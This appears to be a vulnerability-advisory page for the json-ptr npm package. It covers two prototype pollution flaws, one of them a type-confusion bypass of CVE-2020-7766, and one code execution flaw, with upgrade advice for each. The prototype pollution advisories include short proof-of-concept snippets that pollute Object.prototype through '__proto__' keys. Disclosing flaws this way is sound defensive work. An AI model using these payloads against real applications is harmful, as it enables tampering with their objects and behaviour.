json-ptr@1.2.1-ts.cf62f17 vulnerabilities

json-ptr is a complete implementation of JSON Pointer (RFC 6901) for nodejs and modern browsers.

Affected versions of this package are vulnerable to Prototype Pollution. A type confusion vulnerability can lead to a bypass of CVE-2020-7766 when the user-provided keys used in the pointer parameter are arrays.

PoC

const { JsonPointer } = require("json-ptr");

// JsonPointer.set({}, ['__proto__', 'polluted'], 'yes', true); 
// console.log(polluted); // Error: Attempted prototype pollution disallowed.

JsonPointer.set({}, [['__proto__'], 'polluted'], 'yes', true); 
console.log(polluted); // yes

Upgrade json-ptr to version 3.0.0 or higher.

json-ptr is a complete implementation of JSON Pointer (RFC 6901) for nodejs and modern browsers.

Affected versions of this package are vulnerable to Arbitrary Code Execution via the .get() method.

Upgrade json-ptr to version 2.1.0 or higher.

json-ptr is a complete implementation of JSON Pointer (RFC 6901) for nodejs and modern browsers.

Affected versions of this package are vulnerable to Prototype Pollution. The issue occurs in the set operation (https://flitbit.github.io/json-ptr/classes/_src_pointer_.jsonpointer.html#set) when the force flag is set to true.

The function recursively set the property in the target object, however it does not properly check the key being set, leading to a prototype pollution.

PoC

• install json-ptr module:

• npm i json-ptr

• run the following poc.js:

const { JsonPointer } = require("json-ptr");

let obj = {};
console.log("Before : " + obj.polluted);
// JsonPointer.set({}, '/constructor/prototype/polluted', "yes", true);
JsonPointer.set({}, '/__proto__/polluted', "yes", true);
console.log("After : " + obj.polluted);

Observed output:

Before : undefined
After : yes

Upgrade json-ptr to version 2.0.0 or higher.